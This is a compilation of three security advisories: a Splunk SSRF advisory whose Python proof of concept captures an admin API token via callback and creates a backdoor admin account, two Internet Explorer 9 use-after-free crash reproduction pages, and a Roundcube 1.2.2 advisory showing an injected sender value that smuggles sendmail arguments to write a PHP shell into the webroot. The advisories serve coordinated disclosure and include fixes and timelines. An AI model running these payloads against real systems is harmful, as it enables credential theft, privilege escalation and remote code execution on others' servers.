[POC SSRF LINK]
/en-US/alerts/launcher?eai%3Aacl.app=launcher&eai%3Aacl.owner=*&severity=*&alerts_id=[DOMAIN]&search=test
The proof of concept below can be used to listen for SSRF connections
and automatically create a malicious privileged user when an
administrative token is captured.
[POC - splunk-poc.py]
'''
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import httplib
import ssl
import requests
token = ''  # Empty until MyHandler.do_GET stores a captured Authorization token.
class MyHandler(BaseHTTPRequestHandler):
    """Callback listener for the SSRF PoC: stores the bearer token it receives.

    The vulnerable Splunk instance is induced to request this server with the
    victim's REST token in the Authorization header (see the advisory text
    above); do_GET copies that token into the module-level `token`.
    """
    def do_GET(self):
        global token
        try:
            # The header value is "Splunk <token>"; the 7-character prefix is
            # dropped here and re-added when the token is replayed.
            token = self.headers.get('Authorization')[7:]
            print "[+] Captured Splunk API token from GET request"
        except Exception, e:
            # A request without the header makes the slice raise on None;
            # that is treated as "no token".  No HTTP response is written
            # on either path.
            print "[-] No API token captured on incoming connection..."
def adminTokenNotCaptured():
    """Return True while no admin token has been captured.

    Used as the listener's loop condition: with an empty `token` it returns
    True without any network call.  Once a token exists it is replayed
    against the splunkd REST port (8089) to look up the token's owner, and
    the function returns False only when that page reports userName "admin".
    """
    global token
    if token:
        query = "/services/authentication/httpauth-tokens/" + token
        # NOTE(review): certificate verification is disabled, presumably
        # because splunkd serves a self-signed certificate.  "<SPLUNK IP>"
        # is a placeholder to be filled in.
        conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089,
                                       context=ssl._create_unverified_context())
        conn.putrequest("GET", query)
        conn.putheader("Authorization", "Splunk %s" % token)
        conn.endheaders()
        context = conn.getresponse().read()
        if 'userName">admin' in context:
            print "[+] Confirmed Splunk API token belongs to admin user"
            print "[+] Admin Splunk API Token: %s" % token
            return False
        else:
            # Non-admin token: keep listening for another callback.
            print "[!] Splunk API token does not belong to admin user"
    return True
def poc():
    """Use the captured admin token to create a privileged user via the REST API.

    Posts name/password/roles to /services/authentication/users over HTTPS
    with certificate verification disabled, and reports success when the
    response contains a <title> for the new account.  "<SPLUNK IP>" is a
    placeholder to be filled in; the URL literal is line-wrapped in some
    copies of this advisory.
    """
    global token
    create_user_uri = "https://<SPLUNK IP>:8089/services/authentication/users"
    params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'}
    auth_header = {'Authorization': 'Splunk %s' % token}
    requests.packages.urllib3.disable_warnings()
    response = requests.post(url=create_user_uri, data=params,
                             headers=auth_header, verify=False)
    if "<title>infosec" in response.content:
        print "[+] POC admin account 'infosec:password' successfully created"
    else:
        print "[-] No account was created"
        print response.content
if __name__ == "__main__":
    try:
        print "[+] Starting HTTP Listener"
        server = HTTPServer(("", 8080), MyHandler)
        # Serve one request at a time until adminTokenNotCaptured() sees an
        # admin token; the first check runs before any request has arrived.
        while adminTokenNotCaptured():
            server.handle_request()
        poc()
    except KeyboardInterrupt:
        # NOTE(review): if the interrupt lands before HTTPServer() returns,
        # `server` is unbound here and the close raises NameError.
        print "[+] Stopping HTTP Listener"
        server.socket.close()
'''
+----------+
| Solution |
+----------+
Update to Splunk 6.5.0 or later. Full information about all patched
versions is provided in the reference links below.
+------------+
| Timeline |
+------------+
24/08/2016 – Initial disclosure to vendor
25/08/2016 – Vendor acknowledges receipt of the advisory and confirms
vulnerability.
28/09/2016 – Sent follow up email asking for status update
30/09/2016 – Vendor replies fixes are being backported to all supported
versions of the software.
10/11/2016 – Vendor releases security advisory and patched software versions
09/12/2016 – Public disclosure
+------------+
| Additional |
+------------+
http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
https://www.splunk.com/view/SP-CAAAPSR [SPL-128840]
'''
<!--
Source: http://blog.skylined.nl/20161208001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. JavaScript does not appear to be required for an attacker to trigger the vulnerable code path.
Details
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The EIP provided me with some details of their analysis, which I'll paraphrase here: It is a use-after-free vulnerability where the span object in the frame.html file is reused after being freed. It appears to be impossible to reallocate the freed memory before it is reused. Part of the freed memory is overwritten when it is freed because a WORD FreeEntryOffset value is stored at offset 0. This value is then used as part of a pointer to a vftable in order to call a method. This pointer now consists of the upper 16-bits of the old vftable, while the lower 16-bits contain the FreeEntryOffset value. Exploitation is near impossible without a way to have more control over this pointer in the freed memory block. ZDI also did a more thorough analysis and provided very similar details in their advisory. I have included a number of reports created using a predecessor of BugId below.
Repro.html:
-->
<!-- Outer page of the reduced fuzzer case: it reloads itself on every load,
     so the iframe document (Frame.html, listed below) is parsed and torn
     down continuously. -->
<html>
<body onload="location.reload();">
<iframe src="Frame.html"></iframe>
</body>
</html>
<!--
Frame.html:
<!doctype html>
<!-- Frame document of the reduced fuzzer case: a span styled as a table
     caption with a ::first-line text-transform, nested between anchors.
     Per the time-line below, Microsoft addressed this in MS13-037. -->
<html>
<head>
<style type="text/css">
.x{
display:table-caption;
}
.x:first-line{
text-transform:uppercase;
}
</style>
</head>
<body>
<a>
<span class="x">
<a>
</a>
</span>
</a>
</body>
</html>
Time-line
27 September 2012: This vulnerability was found through fuzzing.
3 October 2012: This vulnerability was submitted to EIP.
11 October 2012: This vulnerability was rejected by EIP.
2 November 2012: This vulnerability was submitted to ZDI.
19 November 2012: This vulnerability was acquired by ZDI.
22 January 2013: This vulnerability was disclosed to Microsoft by ZDI.
29 May 2013: Microsoft addresses this vulnerability in MS13-037.
8 December 2016: Details of this vulnerability are released.
-->
<!--
Source: http://blog.skylined.nl/20161207001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. JavaScript does not appear to be required for an attacker to trigger the vulnerable code path.
Details
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The ZDI did do a more thorough analysis and provide some details in their advisory. I have included a number of reports created using a predecessor of BugId below.
Repro.html:
-->
<!doctype html>
<!-- Reduced fuzzer case: the page reloads itself on load; the markup mixes
     floated elements, an image map and a zoomed input inside a <var>, plus
     a ::first-letter border on a whitespace-preserved <q>.  Per the
     time-line below, Microsoft addressed this in MS13-037. -->
<html>
<head>
<script>
window.onload=function(){location.reload();};
</script>
</head>
<body>
<var>
<img class="float" ismap="ismap" usemap="map"/>
<map id="map"><area/></map>
<dfn class="float"></dfn>
<a class="float"></a>
<input class="zoom"/>
text
</var>
<q class="border float zoom" xml:space="preserve"> </q>
</body>
<style type="text/css">
.float {
float:left;
}
.zoom {
zoom:3000%;
}
.border::first-letter {
border-top:1px;
}
</style>
</html>
<!--
Time-line
1 November 2012: This vulnerability was found through fuzzing.
2 November 2012: This vulnerability was submitted to ZDI.
19 November 2012: This vulnerability was acquired by ZDI.
4 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
29 May 2013: Microsoft addresses this vulnerability in MS13-037.
7 December 2016: Details of this vulnerability are released.
-->
Roundcube 1.2.2: Command Execution via Email
============================================
You can find the online version of the advisory here:
https://blog.ripstech.com/2016/roundcube-command-execution-via-email/
Found by Robin Peraglie with RIPS
Introduction
------------
Roundcube is a widely distributed open-source webmail software used by
many organizations and companies around the globe. The mirror on
SourceForge, for example, counts more than 260,000 downloads in the last
12 months which is only a small fraction of the actual users. Once
Roundcube is installed on a server, it provides a web interface for
authenticated users to send and receive emails with their web browser.
Affected Versions: 1.0.0 - 1.2.2
Requirements
------------
- Roundcube must be configured to use PHP's mail() function (by default)
- PHP's mail() function is configured to use sendmail (by default)
- PHP is configured to have safe_mode turned off (by default)
- An attacker must know or guess the absolute path of the webroot
Description
-----------
In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized
into the fifth argument of a call to PHP's built-in function mail()
which is documented as security critical. The problem is that the
invocation of the mail() function will cause PHP to execute the sendmail
program. The fifth argument allows passing extra arguments to this execution,
which allows sendmail to be configured. Since sendmail offers the -X
option to log all mail traffic in a file, an attacker can abuse this
option and spawn a malicious PHP file in the webroot directory of the
attacked server. The following code lines trigger the vulnerability.
program/steps/mail/sendmail.inc
********************************************************************************
$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST,
true, $message_charset);
⋮
$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error,
$mailbody_file, $smtp_opts);
********************************************************************************
Here, the value of the POST parameter "_from" is fetched and Roundcube's
deliver_message() method is invoked with the value used as second
argument $from.
program/lib/Roundcube/rcube.php
********************************************************************************
public function deliver_message(&$message, $from, $mailto, &$error,
&$body_file = null, $options = null) {
⋮
if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
$sent = mail($to, $subject, $msg_body, $header_str);
else
$sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
********************************************************************************
This method will then pass the $from parameter to a call of the mail()
function. The idea is to pass a custom "from" header to the sendmail
program via the "-f" option.
Proof of Concept
----------------
When an email is sent with Roundcube, the HTTP request can be
intercepted and altered. Here, the "_from" parameter can be modified in
order to place a malicious PHP file on the system.
********************************************************************************
example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php
********************************************************************************
This allows an attacker to spawn a shell file "rce.php" in the web root
directory with the contents of the "_subject" parameter that can contain
PHP code. After performing the request, a file with the following
content is created:
********************************************************************************
04731 >>> Recipient names must be specified
04731 <<< To: squinty@localhost
04731 <<< Subject: <?php phpinfo(); ?>
04731 <<< X-PHP-Originating-Script: 1000:rcube.php
04731 <<< MIME-Version: 1.0
04731 <<< Content-Type: text/plain; charset=US-ASCII;
04731 <<< format=flowed
04731 <<< Content-Transfer-Encoding: 7bit
04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100
04731 <<< From: example@example.com -OQueueDirectory=/tmp
04731 <<< -X/var/www/html/rce.php
04731 <<< Message-ID: <390a0c6379024872a7f0310cdea24900@localhost>
04731 <<< X-Sender: example@example.com -OQueueDirectory=/tmp
04731 <<< -X/var/www/html/rce.php
04731 <<< User-Agent: Roundcube Webmail/1.2.2
04731 <<<
04731 <<< Funny e-mail message
04731 <<< [EOF]
********************************************************************************
Since the email data is unencoded, the subject parameter is reflected in
plaintext, which allows the injection of PHP tags into the shell file.
Time Line
---------
* 2016/11/21: First contact with vendor
* 2016/11/28: Vendor agrees to coordinated disclosure
* 2016/11/28: Vendor releases updated version Roundcube 1.2.3